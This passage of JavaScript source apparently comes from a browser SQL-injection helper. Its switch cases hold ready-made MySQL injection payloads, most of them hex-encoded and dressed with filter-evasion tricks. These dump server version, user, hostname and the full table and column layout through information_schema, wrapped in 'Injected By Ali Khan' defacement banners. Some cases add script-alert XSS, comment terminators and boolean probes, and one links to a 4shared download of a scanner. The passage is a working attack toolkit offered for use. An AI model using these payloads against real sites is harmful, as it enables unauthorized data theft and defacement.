(@running_number:=@running_number-1),3,0x30 ),0x2e20, @tbl:=table_name,0x3c666f6e7420636f6c6f723d626c75653e,0x2d2d2d2d2d2d2d3e7461626c65207265636f7264733a3a,0x3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e,(select table_rows from information_schema.tables where table_schema=Database() and table_name=@tbl),0x3c2f666f6e743e,0x2e)),0x00,0x00),@c)";
911.                     break;
912.             case '144':
913.                         txt = "coNCat%0a(0x3c72696768743e3c696d67207372633d22687474703a2f2f342e316d2e79742f56476c4d4c6b692e6a70672220776964743d2232303022206865696768743d22323030222f3e3c2f72696768743e3c62723e3c623e3c666f6e7420636f6c6f723d2270757270656c222073697a653d22332220666163653d22616c6472696368223e3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d22626c7565222073697a653d22332220666163653d22616c6472696368223e496e6a656374656420427920416c69204b68616e3c62723e3c2f666f6e743e3c666f6e7420636f6c6f723d70757270656c222073697a653d22332220666163653d22616c6472696368223e3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d22626c7565222073697a653d22332220666163653d22616c6472696368223e486f73746e616d65203c62723e,@@HOSTNAME,0x3c62723e,0x3c2f666f6e743e3c666f6e7420636f6c6f723d2270757270656c222073697a653d22332220666163653d22616c6472696368223e3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d22626c7565222073697a653d22332220666163653d22616c6472696368223e44617461626173652056657273696f6e202d ,version(), 0x3c62723e3c666f6e7420636f6c6f723d2279656c6c6f77222073697a653d22332220666163653d22616c6472696368223e3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d22626c7565222073697a653d22332220666163653d22616c6472696368223e5072696d617279204461746162617365202d20,database(),0x3c62723e3c666f6e7420636f6c6f723d2279656c6c6f77222073697a653d22332220666163653d22616c6472696368223e3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d22626c7565222073697a653d22332220666163653d22616c6472696368223e55736572202d20,user(),0x3c62723e3c666f6e7420636f6c6f723d2279656c6c6f77222073697a653d22332220666163653d22616c6472696368223e3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d22626c7565222073697a653d22332220666163653d22616c6472696368223e4f53202d20,@@version_compile_os,0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d22726564222073697a653d22332220666163653d22616c6472696368223e,(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat(@,0x3c62723e3c666f6e7420636f6c6f723d2279656c6c6f772220666163653d22616c6472696368222073697a653d2233223e3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d227265642220666163653d22616c6472696368222073697a653d2233223e,database(),0x203c2f666f6e743e3c666f6e7420636f6c6f723d22626c75652220666163653d22616c6472696368222073697a653d2233223e3d3e3c2f666f6e743e20,TaBLe_nAMe,0x203c666f6e7420636f6c6f723d22626c75652220666163653d22616c6472696368222073697a653d2233223e2d3c2f666f6e743e20,column_name))))a))";
914.                    
915.             case '145':
916.                         txt = "concat(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,concat(concat(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a20416c69204b68616e3a3a203c2f666f6e743e3c2f63656e7465723e3c2f623e),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),concat(0x3c62723e3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c62723e546f74616c205461626c657320496e20416c6c20446174616261736573203a3a20,(select count(*) from information_Schema.tables),0x3c62723e5461626c657320436f756e7420496e205072696d617279204461746162617365203a3a20,(Select count(*) from information_Schema.tables where table_schema=database()),(select(@x)from(select(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(select(0) from(information_schema.columns)where(table_schema=database()) and(0x00)in(@x:=Concat(@x, 0x3c62723e, if( (@tbl!=table_name), Concat(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,LPAD(@r:=@r%2B1, 2, 0x30),0x2e,@tbl:=table_name,0x3c666f6e7420636f6c6f723d626c61636b3e203a3a20436f6c756d6e7320496e2054686973205461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@tbl),0x20284461746162617365203a3a20,database(),0x29,0x3c2f666f6e743e,0x3c62723e), 0x00),0x203a3a20,0x3c666f6e7420636f6c6f723d677265656e2073697a653d323e,0x7e20,column_name,0x3c2f666f6e743e ))))x))))";
917.                     break;
918.             case '145':
919.                         txt = "concat(0x416c69204b68616e3a3a3a3a ,version(),0x3c62723e446220636f756e74203a3a20,(select count(*) from information_schema.schemata),0x3c62723e5461626c657320636f756e7420696e20696e666f726d6174696f6e20736368656d61203a3a20,(select count(*) from information_schema.tables where table_schema=0x696e666f726d6174696f6e5f736368656d61),(select(@a)from(select(@a:=0x00),(select(@a) from (information_schema.tables)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@a:=concat(@a,0x3c62723e7461626c65206e616d653a3a20,@tbl:=table_name,0x3a3a20636f6c756d6e7320636f756e7420696e2074686973207461626c652061726520203a3a20,(select(count(*))from(information_schema.columns)where(table_name=@tbl))))))a)";
920.                     break;
921.             case '146':
922.                         txt = "concat(0x3c62723e3c666f6e7420636f6c6f723d7265642073697a653d35203e202121496e6a656374656420427920416c69204b68616e21213c2f666f6e743e,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d33203e56455253494f4e3a2d3c2f666f6e743e,version(),0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d33203e555345523a2d3c2f666f6e743e,user(),0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d33203e44415441424153453a2d3c2f666f6e743e,database(),0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d33203e555549443a2d3c2f666f6e743e,uuid(),0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d33203e424153454449523a3c2f666f6e743e,@@basedir,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d33203e484f53544e414d453a2d3c2f666f6e743e,@@hostname,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d33203e504f52543a2d3c2f666f6e743e,@@port,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d33203e53594d4c494e4b3a2d3c2f666f6e743e,@@GLOBAL.have_symlink,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d33203e4f533a2d3c2f666f6e743e,@@version_compile_os,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d33203e424954532044455441494c3a2d3c2f666f6e743e,@@VERSION_COMPILE_MACHINE,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d33203e46494c452053595354454d3a2d3c2f666f6e743e,@@CHARACTER_SET_FILESYSTEM)";
923.                     break;
924.             case '147':
925.                         txt = "CONCAT(0x7e,0x223e3c62723e,0x3c62723e3c62723e3c62723e3c2f62723e,0x3c2f74723e3c7461626c653e,0x3c666f6e742020636f6c6f723d22707572706c65223e3c68746d6c20353e3c62723e3c623e3c693e3c666f6e7420636f6c6f723d677265656e3e416c69204b68616e203c2f666f6e743e3a3a203c666f6e7420636f6c6f723d707572706c65652c63757272656e745f646174652829,0x3c2f666f6e743e,0x3c6f6c2073746172743d2231223e,(SELECT(@xy)FROM(SELECT(@xy:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@xy:=CONCAT(@xy,0x3c6c693e,@xyz:=table_name,0x3c2f666f6e743e3c666f6e7420636f6c6f723d22677265656e223e202b4e6f204f6620436f6c756d6e73203d20,(select count(column_name) from information_schema.columns where table_name=@xyz),0x3c666f6e7420636f6c6f723d6d6167656e74613e207e7e546f74616c205265636f72643d20,ifnull(table_rows,0),0x3c666f6e7420636f6c6f723d626c75653e207e7e53697a65206f6620446174613d20,(data_length),0x203c666f6e7420636f6c6f723d7265643e423c2f666f6e743e,0x3c2f666f6e743e3c666f6e7420636f6c6f723d22707572706c65223e,0x3c2f6c693e))))xy))";
926.                     break;
927.             case '164':
928.                         txt = "/*!50000concat*/(0x3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2a2a20496e6a656374656420427920416c69204b68616e202a2a2a3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e2073697a653d343e3c623e446174616261736520bb20,database(),0x20ab,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75652073697a653d343e3c623e5573657220bb20,user(),0x20ab,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c652073697a653d343e3c623e56657273696f6e20bb20,version(),0x20ab,0x3c2f666f6e743e,0x3c62723e,(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a))";
929.                     break;
930.             case '165':
931.                         txt = "/*!50000cOnCat*/(0x3c2f666f6e743e3c666f6e7420636f6c6f723d7265643e,0x2f2a496e6a656374656420427920416c69204b68616e2a2f,0x3c62723e,version(),0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(`information_schema`.`columns`)where@:=make_set(511,@,table_name,0x3e3e,column_name,0x3c42523e)),@))";             
932.                     break;
933.             case '148':
934.                         txt = "https://www.facebook.com/bu.shardar";
935.                     break;
936.             case '149':
937.                         txt = "http://www.4shared.com/rar/LVXUdFffce/LHH.html";
938.                     break;
939.             case '150':
940.                         txt = "http://www.4shared.com/zip/FayWmp4rba/Acunetix_Web_Vulnerability_Sca.html";
941.                     break;
942.             case '151':
943.                         txt = "0x3c666f6e7420636f6c6f723d22626c61636b223e";
944.                     break;
945.             case '190':
946.                         txt = "0x3c666f6e7420636f6c6f723d79656c6c6f773e";
947.                     break;
948.             case '153':
949.                         txt = "0x3c666f6e7420636f6c6f723d77686974653e";
950.                     break;
951.             case '154':
952.                         txt = "0x3c666f6e7420636f6c6f723d2723,rand()*100000,0x3c62723e";
953.                     break;
954.             case '155':
955.                         txt = "0x223e";
956.                     break;
957.             case '156':
958.                         txt = "0x3c2f6e6f7363726970743e";
959.                     break;
960.             case '157':
961.                         txt = "0x3c2f7363726970743e";
962.                     break;
963.             case '158':
964.                         txt = "0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e";
965.                     break;
966.             case '159':
967.                         txt = "0x3c2f7469746c653e20a";
968.                     break;
969.             case '160':
970.                         txt = "0x223e3c62723e3c2f6469763e3c6469763e";
971.                     break;
972.             case '164':
973.                         txt = "0x3c2f6f7074696f6e3e3c2f73656c6563743ea";
974.                     break;     
975.             case '161':
976.                         txt = "0x3c63656e7465723e";
977.                     break;
978.             case '162':
979.                         txt = "0x3c2f63656e7465723e";
980.                     break;
981.             case '163':
982.                         txt = "/*!50000concat*/(/*!50000concat*/(0x3c616464726573733e3c6120687265663d2268747470733a2f2f7777772e66616365626f6f6b2e636f6d2f416b446b313233223e212121443356494c204b214c4c335220486552652121213c63656e7465723e3c696d67207372633d22687474703a2f2f312e316d2e79742f365661383936562e676966223e3c62723e3c2f613e3c68313e3c666f6e7420636f6c6f723d22526564223e496e6a65637465642062792022416c69204b68616e2028416b446b29223c2f666f6e743e3c68313e3c2f63656e7465723e3c62723e3c666f6e7420636f6c6f723d20236633643933613e204461746162617365207e3e3e203c2f666f6e743e,database(),0x3c62723e3c666f6e743e3c666f6e7420636f6c6f723d20233066396439363e2056657273696f6e207e3e3e203c2f666f6e743e,@@version,0x3c62723e,0x3c666f6e743e203c666f6e7420636f6c6f723d20233066373639643e2055736572207e3e3e203c2f666f6e743e,user(),0x3c62723e,0x3c666f6e743e3c666f6e7420636f6c6f723d20233066396433653e20506f7274207e3e3e203c2f666f6e743e,@@port,0x3c62723e,0x3c666f6e743e3c666f6e7420636f6c6f723d20233464356137333e204f53207e3e3e203c2f666f6e743e,@@version_compile_os,0x3c62723e,0x3c666f6e743e203c666f6e7420636f6c6f723d20233661343437323e2044617461204469726563746f7279204c6f636174696f6e207e3e3e203c2f666f6e743e,@@datadir,0x3c62723e,0x3c666f6e743e203c666f6e7420636f6c6f723d20233331303433623e2055554944207e3e3e203c2f666f6e743e,UUID(),0x3c62723e,0x3c666f6e743e3c666f6e7420636f6c6f723d20233639303436373e2043757272656e742055736572207e3e3e203c2f666f6e743e,current_user(),0x3c62723e,0x3c666f6e743e3c666f6e7420636f6c6f723d20233834323038313e2054656d70204469726563746f7279207e3e3e203c2f666f6e743e,@@tmpdir,0x3c62723e,0x3c666f6e743e3c666f6e7420636f6c6f723d20233963366239343e20424954532044455441494c53207e3e3e203c2f666f6e743e,@@version_compile_machine,0x3c62723e,0x3c666f6e743e203c666f6e7420636f6c6f723d20233966306138383e2046494c452053595354454d207e3e3e203c2f666f6e743e,@@CHARACTER_SET_FILESYSTEM,0x3c62723e,0x3c62723e,0x3c666f6e743e203c666f6e7420636f6c6f723d20233932343235643e2020486f7374204e616d65207e3e3e203c2f666f6e743e,@@hostname,0x3c62723e203c666f6e743e3c666f6e7420636f6c6f723d20233934303133333e2053797374656d2055554944204b6579207e3e3e203c2f666f6e743e,UUID(),0x3c62723e203c666f6e743e3c666f6e7420636f6c6f723d20236133323635313e2053796d204c696e6b20207e3e3e203c2f666f6e743e,@@GLOBAL.have_symlink,0x3c62723e203c666f6e743e203c666f6e7420636f6c6f723d20233538306331393e2053534c207e3e3e203c2f666f6e743e,@@GLOBAL.have_ssl,0x3c62723e203c666f6e743e203c666f6e7420636f6c6f723d20233939316633333e2042617365204469726563746f7279207e3e3e203c2f666f6e743e,@@basedir,0x3c62723e3c666f6e742073697a653d223570782220636f6c6f723d22426c61636b223e2047726565747a20546f207e20203c2f666f6e743e3c62723e3c6d6172717565652077696474683d22383025223e202a2042656e7a692042726f202a207c202a204768617a696620416465656d2042726f202a207c20202a20556d65722041686d65642042726f202a207c202a205261746e61205365686b61722042726f202a207c202a2048617373616e20417161667565202a207c202a20416264756c6c61682042726f202a207c202a2054616c68612042726f202a207c202a205361696b61742042726f202a207c202a204a616e75732042726f202a207c202a20416e6f6e204861726973202a207c202a2044656c7761722042726f202a207c202a204e757220446970752042726f202a207c202a204b617a616d2047756a6a61722042726f7c2026207c202a205468616e6b7320466f722044696f7320556d61722041726665656e20536861682a207c3c2f6d6172717565653e3c2f616464726573733e3c62723e3c666f6e7420636f6c6f723d22626c7565223e3c696672616d65207372633d2268747470733a2f2f7777772e796f75747562652e636f6d2f656d6265642f31695830646b52686a37673f72656c3d30266175746f706c61793d312220616c6c6f7766756c6c73637265656e3d2222206672616d65626f726465723d223022206865696768743d2230222077696474683d2230223e3c2f696672616d653e,(select(@a)from(select(@a:=0x00),(select(@a)from(/*!50000information_schema*/.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=/*!50000concat+++++*/(@a,table_name,0x3c666f6e7420636f6c6f723d22726564223e20202d2d2d3e203c2f666f6e743e,column_name,0x3c62723e))))a)))";
983.                     break;
984.             case '346':
985.                         txt = "concat%280x3c2f686561643e3c626f6479206267636f6c6f72203d20626c61636b3e3c62723e3c68313e7e3a20496e6a656374656420427920416c69204b68616e203a7e3c2f68313e3c62723e3c666f6e742073697a653d3520636f6c6f723d677265656e3e4461746162617365203a ,database%28%29,0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f72203d206d616e676574612073697a653d343e2055534552203a ,user(),0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d7265642073697a653d353e20486176652053796d6c696e6b203f203a ,@@HAVE_SYMLINK, 0x3c2f666f6e743e3c62723e3c666f6e742073697a65203d203520636f6c6f72203d206d616e676574613e20486f73746e616d65203a ,@@HOSTNAME,0x3c6469763e3c666f6e7420636f6c6f723d207265643e3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3c2f6469763e3c2f666f6e743e3c2f666f6e743e3c68333e3c666f6e7420636f6c6f72203d726564203e44617461626173657320616e6420436f6c756d6e7320496e666f20203a203c62723e3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e,%28SELECT%28@y%29FROM%28SELECT%28@y:=0x00%29,%28@NR:=0%29,%28SELECT%280%29FROM%28INFORMATION_SCHEMA.SCHEMATA%29WHERE%28SCHEMA_NAME!=0x696e666f726d6174696f6e5f736368656d612e736368656d617461%29AND%280x00%29IN%28@y:=CONCAT%28@y,LPAD%28@NR:=@NR%2b1,2,0x30%29,0x3a20,schema_name,0x3c62723e%29%29%29%29y%29,0x3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d353e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d7e7e7e7e7e7e7e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d3c2f666f6e743e3c62723e,%28select%28@x%29from%28select%28@x:=0x00%29,%28@nr:=0%29,(@tbl:=0x0%29,%28select%280%29from%28information_schema.tables%29where%28table_schema=database%28%29%29and%280x00%29in%28@x:=concat_ws%280x20,@x,lpad%28@nr:=@nr%2b1,3,0x0b%29,0x2e203c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e203a3a3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d6d616e676574613e20207b2020436f6c756d6e73203a3a205b3c666f6e7420636f6c6f723d7265643e,%28select+count%28*%29+from+information_schema.columns+where+table_name=@tbl%29,0x3c2f666f6e743e5d20207d3c2f666f6e743e3c62723e%29%29%29%29x%29,0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d352e333e3d3d3d3d3d7e7e7e7e7e414b7e7e7e7e7e3d3d3d3d3d444b3d3d3d3d3d7e7e7e7e7e414b3d3d3d3d3d7e7e7e7e7e444b7e7e7e7e7e3d3d3d3d3d414b3d3d3d3d3d7e7e7e7e7e444b3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d79656c6c6f772073697a653d343e4578747261637465642044617461203a203c2f666f6e743e3c62723e3c68313e7e3a20416c69204b68616e202820414b444b2029205741532048455245203a7e3c2f68313e203c62723e3c64697620616c69676e3d226c656674223e,%28select+concat%280x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e546f74616c20436f6c756d6e20436f756e7420416c6c20446174616261736573203a7e2048454c4c455227532044494f53207e5b,%28Select+count%28column_name%29from%28information_Schema.columns%29%29,0x5d3c62723e3c62723e2f7e,@%29from%28select%28@:=0x00%29,%28@db:=0%29,%28@db_nr:=0%29,%28@tbl:=0%29,%28@tbl_nr:=0%29,%28@col_nr:=0%29,%28select%28@%29from%28information_Schema.columns%29where%28@%29in%28@:=concat%28@,if%28%28@db!=table_schema%29,concat%28%28@tbl_nr:=0x00%29,0x3c666f6e7420636f6c6f723d7265643e,LPAD%28@db_nr:=@db_nr%2b1,2,0x20%29,0x2e20,@db:=table_schema,0x203c666f6e7420636f6c6f723d707572706c653e207e3a205461626c657320436f756e7420546f74616c203a7e202848454c4c455227732044494f5329205b,%28Select+count%28table_name%29from%28information_schema.tables%29where%28table_schema=@db%29%29,0x5d2f7e3c2f666f6e743e3c2f666f6e743e%29,0x00%29,if%28%28@tbl!=table_name%29,concat%28%28@col_nr:=0x00%29,0x3c646976207374796c653d70616464696e672d6c6566743a343070783b3e3c666f6e7420636f6c6f723d626c75653e202020,LPAD%28@tbl_nr:=@tbl_nr%2b1,3,0x0b%29,0x202e20,@tbl:=table_name,0x20202020203c666f6e7420636f6c6f723d707572706c653e2020207b2020436f6c756d6e73203a202848656c6c657227732044696f7329207e20205b,%28Select+count%28column_name%29from%28information_Schema.columns%29where%28table_name=@tbl%29%29,0x5d202f203c666f6e7420636f6c6f723d79656c6c6f773e205265636f726473203a2048454c4c455227732044494f537e205b,%28Select+ifnull%28table_rows,0x30%29+from+information_schema.tables+where+table_name=@tbl%29,0x5d207d3c2f666f6e743e3c2f666f6e743e3c2f666f6e743e3c2f6469763e%29,0x00%29,concat%280x3c646976207374796c653d70616464696e672d6c6566743a383070783b3e3c666f6e7420636f6c6f723d677265656e3e,LPAD%28@col_nr:=@col_nr%2b1,3,0x0b%29,0x2e20,column_name,0x3c2f666f6e743e3c2f6469763e%29%29%29%29%29x%29,0x3c2f6469763e%29";
986.                     break;
987.             case '347':
988.                         txt = "concat(0x3c7363726970743e616c6572742822496e6a656374656420427920416c69204b68616e,0x5c6e,0x56657273696f6e203a3a20,version(),0x5c6e,0x4461746162617365203a3a20,database(),0x5c6e,0x55736572203a3a20,user(),0x5c6e,(select group_concat(table_name,0x3a3a3a3a,column_name+separator+0x5c6e) from information_schema.columns where table_schema=database()),0x5c6e,0x22293c2f7363726970743e)";
989.                     break;
990.             case '348':
991.                         txt = "/*!00000concat*/(0x3c7363726970743e616c6572742822496e6a65637465642b58535345442062792041686d65643a3a,0x5c6e,version(),0x5c6e,database(),0x5c6e,user(),0x5c6e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20";
992.                     break;
993.             case '349':
994.                         txt = "concat/*%00*/%28%27%3C/title%3E%27,%27%3Cb%3E%3Ci%3E%3Cfont%20color=purple%3E%27,%27%3Ch1%3E%27,%27%20Injected by Ahmed%3Cbr%3EThanks For the Challenge%20%27,%27%3C/h1%3E%27,%27%3Cbr%3E%27,%27user+:::::::::+%27,user%28%29,%27%3Cbr%3E%27,%27Version+:::::::::+%27,version%28%29,%27%3Cbr%3E%27,%27DB+:::::::::+%3Cbr%3E%27,database%28%29,%27%3Cbr%3E%27,%27%3Cbr%3E%27,%28select+group_concat%28%27%3Cli%3E%27,table_name,%27%20::::::%20%27,column_name+separator+%27%3Cbr%3E%27%29+from+information_schema.columns+where+table_schema!=%27information_schema%27%29%29";
995.                     break;
996.             case '350':
997.                         txt = "and(select!x-~0.+from(select(concat(0x3c62723e494e4a45435445442042592041484d4544,0x3c62723e,0x56455253494f4e203a3a20,VERSION(),0x3c62723e,0x4441544142415345203a3a20,DATABASE(),0x3c62723e,0x55534552203a3a20,USER(),0x3c62723e,0x3c62723e,(select group_concat(table_name,0x3a,column_name,0x3c62723e) from information_schema.columns where table_schema=database())))x)a)-- -";
998.                     break;
999.             case '351':
1000.                         txt = "exp(~(select * from (select database())abc))";
1001.                     break;
1002.             case '352':
1003.                         txt = "(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)";
1004.                     break;                             
1005.       case '353':
1006.                         txt = "concat/*!%28unhex%28hex%28concat/*!%280x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex%28hex%28%20concat/*!%280x3c63656e7465723e3c666f6e7420636f6c6f723d477265656e2073697a653d343e3c623e7e7e7e3a3a3a3a3a496e6a656374656420627920416c69204b68616e3a3a3a3a3a7e7e7e3c62723e3c666f6e7420636f6c6f723d7265643e284e4f4f42293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e%29%29%29,%200x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,%20version%28%29,0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database%28%29,0x3c62723e44617461626173652055736572203a3a20,user%28%29,%20%28/*!12345selEcT*/%28@x%29/*!from*/%28/*!12345selEcT*/%28@x:=0x00%29,%28@r:=0%29,%28@running_number:=0%29,%28@tbl:=0x00%29,%28/*!12345selEcT*/%280%29%20from%28information_schema./**/columns%29where%28table_schema=database%28%29%29%20and%280x00%29in%28@x:=Concat/*!%28@x,%200x3c62723e,%20if%28%20%28@tbl!=table_name%29,%20Concat/*!%280x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,%20LPAD%28@r:=@r%2b1,%202,%200x30%29,0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database%28%29,%200x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e%29,%200x00%29,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD%28@running_number:=@running_number%2b1,3,0x30%29,0x2e20,0x3c2f666f6e743e,%200x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e%29%29%29%29x%29%29%29%29%29*/";
1007.                     break;
1008.             case '354':
1009.                         txt = "concat( 0x3c62723e, version(),0x3a3a20416c69204b68616e,0x3c62723e64617461626173653a20,DataBasE/**X**/(),0x3c62723e757365723a20,UsEr/**X**/(), @s)";
1010.                     break;     
1011.       case '355':
1012.             txt = "@x";
1013.           break;
1014.       case '356':
1015.             txt = "@";
1016.           break;
1017.       case '357':
1018.             txt = "concat(0x496e6a656374656420427920416c69204b68616e203c62723e,user/**_**/(),0x3c62723e,database/**_**/(),0x3c62723e,version(),@x)";
1019.           break;
1020.       case '358':
1021.             txt = "concat/**_**/(0x222f3e272f3e3c62723e,version(),0x203a3a204b48554e5445523c62723e,@x)";
1022.           break;
1023.       case '359':
1024.             txt = "@x";
1025.           break;
1026.       case '360':
1027.             txt = "@s";
1028.           break;
1029.       case '361':
1030.             txt = "ConCat(0x3a3a3a20496e6a656374656420627920414c69203a3a3a3a203c62723e,@)";
1031.           break;    
1032.       case '362':
1033.             txt = "concat('ALi_KhAN<br>',version(),'<br>','User::| ',User/**_**/(),'<br>','Database::| ',database/**_**/(),'<br>',@aLi) ";
1034.           break;
1035.       case '363':
1036.             txt = "concat(0x3c62723e3c62723e3c62723e3c62723e,0x416c693a3a3a,version(),0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x3e3e3e,table_name,0x3a3a3a3a,column_name))))x))";
1037.           break;
1038.       case '364':
1039.             txt = "ConCat/**alibro**/(0x496e6a656374656420427920416c69204b68616e3a3a3a3a3a3a,version(),0x3c62723e75736572203a3a20,user/**alibro**/(),0x3c62723e4461746162617365203a3a20,database/**alibro**/(),@)";
1040.           break;
1041.       case '365':
1042.             txt = "@";
1043.           break;
1044.  
1045.     /*FabiHa Menu*/
1046.  
1047.       case '403':
1048.             txt = "--";
1049.           break;
1050.  
1051.         case '404':
1052.             txt = "-- -";
1053.           break;
1054.  
1055.         case '405':
1056.             txt = "--+";
1057.           break;
1058.  
1059.         case '406':
1060.             txt = "--+-";
1061.           break;
1062.  
1063.         case '407':
1064.             txt = "--'-";
1065.           break;
1066.  
1067.         case '408':
1068.             txt = "+--+";
1069.           break;
1070.  
1071.         case '409':
1072.             txt = "/*";
1073.           break;
1074.         case '410':
1075.             txt = "%23";
1076.           break;
1077.             case '411':
1078.             txt = "%60') %23";
1079.           break;
1080.             case '412':
1081.             txt = "%22";
1082.           break;
1083.             case '413':
1084.             txt = " ;%00";
1085.           break;
1086.             case '414':
1087.             txt = " %u0027";
1088.           break;
1089.             case '415':
1090.             txt = " %2523";
1091.           break;
1092.             case '416':
1093.             txt = " %2560";
1094.           break;
1095.             case '417':
1096.             txt = " ;%2500";
1097.           break;
1098.             case '418':
1099.             txt = " 0%0a)";
1100.           break;
1101.             case '419':
1102.             txt = " --%a0";
1103.           break;
1104.             case '420':
1105.             txt = "/*";
1106.           break;
1107.             case '421':
1108.             txt = "/\'%23";
1109.           break;
1110.             case '422':
1111.             txt = "/\') %23";
1112.           break;
1113.             case '423':
1114.             txt = "and false";
1115.           break;
1116.             case '424':
1117.             txt = " and true";
1118.           break;
1119.             case '425':
1120.             txt = " and 0";
1121.           break;
1122.             case '426':
1123.             txt = " and 1=1";
1124.           break;
1125.             case '427':
1126.             txt = " and 1=2";
1127.           break;
1128.             case '428':
1129.             txt = " and 1=0";
1130.           break;
1131.             case '429':
1132.             txt = " and 0=1";
1133.           break;
1134.             case '430':
1135.             txt = " and 1!=2";
1136.           break;
1137.             case '431':
1138.             txt = " and '0'='0";
1139.           break;
1140.             case '432':
1141.             txt = " and '0'='0 --";
1142.           break;
1143.             case '433':
1144.             txt = ' and "0"="0';
1145.           break;
1146.             case '434':
1147.             txt = " and '0'='0 %23";
1148.           break;
1149.             case '435':
1150.             txt = " and xxxx=x--";
1151.           break;
1152.             case '436':
1153.             txt = " and 'xxxx'='xxxx";
1154.           break;
1155.             case '437':
1156.             txt = " having 0";
1157.           break;
1158.             case '438':
1159.             txt = " having 1";
1160.           break;
1161.             case '439':
1162.             txt = " having 2";
1163.           break;
1164.             case '440':
1165.             txt = " having 3";
1166.           break;
1167.             case '441':
1168.             txt = " having 1=1";
